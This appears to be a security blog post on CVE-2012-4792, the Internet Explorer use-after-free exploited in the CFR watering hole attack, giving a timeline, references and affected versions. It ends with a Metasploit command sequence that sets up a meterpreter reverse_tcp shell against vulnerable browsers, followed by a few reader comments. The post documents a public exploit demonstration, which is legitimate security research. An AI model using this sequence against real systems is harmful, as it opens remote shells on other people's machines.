Timeline :
CVE reference assigned on 2012-09-06
First samples of the attack discovered in Google cache on 2012-12-07
Vulnerability discovered exploited in the wild on CFR.org around 2012-12-26
Vulnerability details provided by binjo, Eric Romang and FireEye on 2012-12-29
Microsoft Security Advisory published on 2012-12-30
Metasploit PoC provided on 2012-12-30
Metasploit module name changed on 2012-12-31
PoC provided by :
eromang
mahmud ab rahman
sinn3r
binjo
juan vazquez
Reference(s) :
CVE-2012-4792
MSA-2794220
new IE 0day coming-mshtml!CDwnBindInfo object use after free vulnerability
Attack and IE 0day Informations Used Against Council on Foreign Relations
CFR WATERING HOLE ATTACK DETAILS
Affected version(s) :
Internet Explorer 6
Internet Explorer 7
Internet Explorer 8
Tested on Windows XP Pro SP3 with :
Internet Explorer 8
Description :
Note: The module name has changed from ie_cdwnbindinfo_uaf to ie_cbutton_uaf.
This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CButton object is freed but a reference to it is kept and used again during a page reload. The invalid memory that is then used is controllable, which allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild, targeting mainly China-, Taiwan- and US-based computers.
Commands :
use exploit/windows/browser/ie_cbutton_uaf
set SRVHOST 192.168.178.26
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.26
exploit
sysinfo
getuid
RT @eromang: #Microsoft Internet Explorer CDwnBindInfo Vulnerability #Metasploit Demo http://t.co/YAVyMi8L #infosec #CFR #0day
@eromang anyone tried this on XBOX / windows phone?
Can you provide me download link of affected internet explorer version on my email id plz